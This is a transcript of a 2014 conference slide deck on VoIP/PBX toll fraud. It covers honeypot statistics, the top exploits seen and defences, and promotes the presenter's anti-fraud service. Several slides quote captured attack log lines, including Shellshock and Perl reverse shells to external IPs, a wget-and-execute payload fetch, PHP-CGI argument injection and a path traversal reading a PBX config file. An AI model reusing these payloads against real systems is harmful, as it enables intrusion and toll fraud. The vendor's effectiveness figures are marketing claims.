No More Fraud, Astricon, Las Vegas 2014
•Download as PPTX, PDF•
0 likes•1,376 views
Presentation regarding VoIP Fraud and PBX hacking at Astricon 2014 VoIP Security Training: Enroll here: http://bit.ly/2GL5MCT
Recommended
Recommended
More Related Content
What's hot
What's hot (19)
Similar to No More Fraud, Astricon, Las Vegas 2014
Similar to No More Fraud, Astricon, Las Vegas 2014 (20)
More from Flavio Eduardo de Andrade Goncalves
More from Flavio Eduardo de Andrade Goncalves (6)
Recently uploaded
Recently uploaded (15)
No More Fraud, Astricon, Las Vegas 2014
- 1. No More Fraud! Let’s say “enough is enough”
- 2. About me Flavio E. Goncalves CTO of SipPulse (www.sippulse.com) Turnkey solutions for VoIP providers and Telcos. Anti-Fraud Solutions
- 3. Why you should care? Exposure for a single T1 line 43200 min/month, US$5/min, 23 lines US$ 4.968.000
- 4. Why they are doing? #1 Allocate a number and a recording in a PRN provider #2 Find a vulnerable device Using shodan #3 Make calls and cash your money
- 5. INTELLIGENCE GRABBED IN HONEYPOTS
- 6. Distribution by country 117636 105603 78656 32795 11910 11120 10702 3736 2836 1978 US FR DE PS RU TW SC SG GB CA
- 7. TOP Prefixes +972 Palestine +44 Great Britain +86 China +20 Egypt
- 8. TOP 5 PBX Exploits in September/October 1. Shellshock 2. PHP/LAMP Injection 3. SQL injection in Trixbox 4. Linksys remote code execution 5. FreePBX Remote Code Execution
- 9. #1 Shellshock • Exploit Date: 09/2014 Specimen: • [26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'" • [26/Sep/2014:13:16:54 +0000] "GET /cgi-sys/ defaultwebpage.cgi HTTP/1.0" 404 507 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"
- 10. #2 SQL injection in Trixbox • Exploit Date: 03/2014 - http://www.exploit-db. com/exploits/32239/ Specimen: • [25/Sep/2014:23:52:29 +0000] "GET /web-meetme/ conf_cdr.php?bookId=1 HTTP/1.1" 404 485 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
- 11. #3 Linksys Remote Code Execution • Exploit Date: 02/2014 - http://www.exploit-db. com/exploits/31683/ Specimen: • [25/Sep/2014:12:50:16 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 538 "-" "-"
- 12. #4 LAMP Attacks • Apache/PHP Remote Exploit • Exploit date 10/2013 • Especimen: • POST /cgi-bin/php5?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n • [26/Sep/2014:15:43:38 +0000] "POST /cgi-bin/ php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61 %66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%6 9%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D %64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%7 0%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%7 2%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F% 73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25“
- 13. #5 CallMeNum (Demo) • Exploit date: 03/2012 • Specimen: • GET /recordings/misc/callme_page.php?action=c&callmenum=888 @ext-featurecodes/n • Application: system • Data: perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,“x.y.z.w:4446"); STDIN- >fdopen($c,r); $~->fdopen($c,w); $c- >write("]QAfH#.Eqncmpn"); system$_ while<>;'
- 14. Unknown Exploits • Jul/2014 • Specimen: [03/Jul/2014] "GET /recordings/locale/sv_SE/LC_MESSAGES/LC/index.php [03/Jul/2014] "GET /fuxkkk.php [03/Jul/2014] "GET /recordings/theme/alexpass.php
- 15. Still uncommon • MANAGER PORT - 5038 • H323 - 1720 • MGCP – 5036 • TFTP – 69 • IAX2 - 4569
- 16. How hackers are getting into your PBX • #1 – Sip Brute Force (Fail2ban is effective) • #2 – Http Exploitation • #3 – Attacks to phones • #4 – Caller ID Spoofing • #5 – Billing/Credit card frauds
- 17. Part – III How to defend #1 Patching Everything and Upgrade frequently #2 Use a Firewall #3 Use a Session Border Controller #4 Use Encryption #5 Use an Anti-Fraud System
- 18. #1 Patch Everything, update frequently • Effectiveness: Low • Risk: High • Cost: High
- 19. #2 Use a Firewall or configure properly IP tables • Effectiveness: High • Risk: Medium • Cost: Low • Absolutely a must do. At least, no Internet access to SSH, no Internet access to HTTP/HTTPS. • No prevention for phones attacks
- 20. #3 Use a Session Border Controller • Effectiveness: Medium • Risk: Medium • Cost: Very High
- 21. #4 Use encryption • Effectiveness: Medium •Risk: Medium •Cost: High if you intend to do mutual authentication
- 22. #5 Use an AntiFraud System • Effectiveness: High • Risk: Very Low • Cost: Medium • Comments: Can detect 99.999% of the attacks, It prevents against caller ID spoofing, Social Engineering and Phone Attacks. • Limitations: Firewall restrictions are required to avoid tampering the anti-fraud rules.
- 23. Working Together in 2 steps 1. Make sure your customer’s firewall and fail2ban is configured right (You) 2. Partner with us to use TFPS on your customers (Us)
- 24. Fraud Prevention for All www.tfps.co
- 25. How effective it is an Anti-Fraud Solution •99.989% just by protocol signature. • Number obtained comparing the attacks registered on the honeypot against rules. Anti-Fraud Effectiveness Detected Undetected
- 26. www.tfps.co || tfps.sippulse.com 1. 99.89% of the attacks prevented by signature detection 2. Collaborative protection. One PBX hacked automatically blocks the IP for the others 3. Mechanism, SIP Redirect •No additional hardware required. •Available for OpenSIPS/Freeswitch/Asterisk
- 27. Asterisk Code [from-internal] ; Set there the context for your users ;FPS for International Calls exten=_011[1-9].,1,set(ip=${CHANNEL(recvip)}) same=>n,SIPAddHeader(P-Received: ${ip}) same=>n,set(ua=${CHANNEL(useragent)}) same=>n,SIPAddHeader(P-UA: ${ua}) same=>n,set(GROUP()=fps) same=>n,set(ncalls=${GROUP_COUNT(fps)}) same=>n,SIPAddHeader(P-Calls: ${ncalls}) same=>n,set(_original=${EXTEN}) same=>n,dial(SIP/fps/${EXTEN:2})
- 28. Asterisk Code [fps] ;For calls not approved exten=_R.,1,Answer() same=>n,playback(unauthorized); (Customize here to generate an error message) same=>n,hangup(21) ;For calls approved exten=_A.,1,Answer() same=>n,Dial(SIP/provider/${original});(Customize here to send the call ahead) same=>n,hangup(16)
- 30. Comparing to other anti-fraud solutions! • Pluggable • No Additional Hardware • Small traffic to be analyzed • Small risk, only a few calls can be affected. • Easy handling of outages
- 32. Thank You! • e-mail: flavio@sippulse.com • skype: flaviogoncalves1 • Twitter: @asteriskguide • blog.tfps.co
- 33. Backup Slides
- 34. #6 FreePBX 2.x Code Execution • Specimen: • [03/Jul/2014:17:28:41 +0000] "GET • /admin/config.php?display=auth&handler=api&func tion=system&args=cd%20/tmp;rm%20- f%20e;wget%20http://93.170.130.201:3003/e;perl% 20e;rm%20-f%20e HTTP/1.1" 404 534 "-" "-"
- 35. #4 VTIGER Exploit (Lots of variations) • 0001189: Vtiger CRM - php inject vulnerability • Specimen • 108.175.157.211 - - [25/Jul/2014:19:28:59 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?mo dule_name=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 404 574 "-" "-“ • 93.170.130.201 - - [03/Jul/2014:21:15:11 +0000] "POST /vtigercrm/graph.php?module=..%2Fmodules%2FSettings&action= savewordtemplate HTTP/1.1" 404 537 "-" "-"
- 36. #4 PHP Code Injection Vulnerability • Specimen: • [03/Jul/2014:13:57:37 +0000] "GET /admin/footer.php?php=info&ip=perl%20-MIO%20- e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3 Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%22 93.170.130.201%3A3333%22)%3B%20STDIN- %3Efdopen(%24c%2Cr)%3B%20%24~- %3Efdopen(%24c%2Cw)%3B%20%24c- %3Ewrite(%22%5DQAfH%23.Eq%5Cnunk%5Cn%22)%3B%20s ystem%24_%20while%3C%3E%3B%27 HTTP/1.1" 404 534 "-" "-“ • "GET /admin/footer.php?php=info&ip=perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,"93.170.130.201:3333"); STDIN->fdopen($c,r); $~->fdopen($c,w); $c- >write("]QAfH#.Eqnunkn"); system$_ while<>;'
- 37. #9 FreePBX Extension Dump Exploitation • Specimen: • 184.105.240.203 - - [08/Jul/2014:01:33:42 +0000] "POST /admin/cdr/call-log. php?handler=cdr&s=&t=&order=calldate &sens=DESC¤t_page=0/admin/cdr/ca ll-comp.php HTTP/1.1" 404 484 "-" "-"
- 38. #6 Freeswitch Attacks GET /freeswitch/app/provision/index.php?mac=df-df-df-df-df- df&template=linksys
- 39. #4 Caller ID Spoofing • 1 - Send 1 million calls and cancel • 2 - Fake the callerID to a PRN • 3 - Wait for the call back.
- 40. Open Source is a Target! •We are seeing scans for: • Vicidial • Astpp • phpMyAdmin (hot) • Tomcat • Jboss • FreeSwitch
- 41. First way to protect 1.Make sure your system is protected by a firewall 1. Vulnerability SCAN 2. Apply firewall rules to prevent unauthorized access to the server 3. Use .htaccess and implement dual authentication
- 42. # 5 SIP Phone Recent Vulnerabilities • Cisco 3905 - http://www.cvedetails.com/cve/CVE-2014-0721/ (10) • Cisco SPA 3XX, 5XX http://www.cvedetails.com/cve/CVE-2014- 3313/ (4.3) • Cisco SPA 3XX, 5XX http://www.cvedetails.com/cve/CVE-2014- 3312/ (6.9) • Yealink - http://www.cvedetails.com/cve/CVE-2014-3427 • Yealink - http://www.cvedetails.com/cve/CVE-2014-3428/
Editor's Notes
- Hello everybody. In the first place I would like to say thanks for the Astricon staff for this wonderful event at Las Vegas and the opportunity to be talking with you. It is a pleasure and honor for me to be here today. Our presentation today will cover the Fraud issue. It is not new, but unfortunately it is still here and growing. Is it time to say enough is enough. There is no technical justification to be frauded in these days. There are lots of tools available and we can work together to make sure your server is protected against these criminals.
- Let me briefly introduce myselfm I’m CEO of SipPulse a softswich developer located in Brazil. We provide turnkey solutions for ITSPs and also Anti-Fraud solutions for PBXs.
- #1 You don’t want to bankrupt your customers. An IP-PBX is one of the few technologies that can bankrupt your customer in less than 30 days. To work with IP-PBX and TDM trunks is actually very dangerous, because there are no limits in phone bills. #2 You don’t want to defend yourself in court. In many cases, mainly when you are doing Software as a Service you can be liable for the security of the solution. #3 You don’t want to stigmatize the Asterisk PBX market and slow sales. If some customers realize the potential dangerous of implementing an IP-PBX, many would give up without even start. Fraud is bad for business. #4 You don’t want the investments in IP telephony going to phone bills. Fraud can consume the customer’s year budget.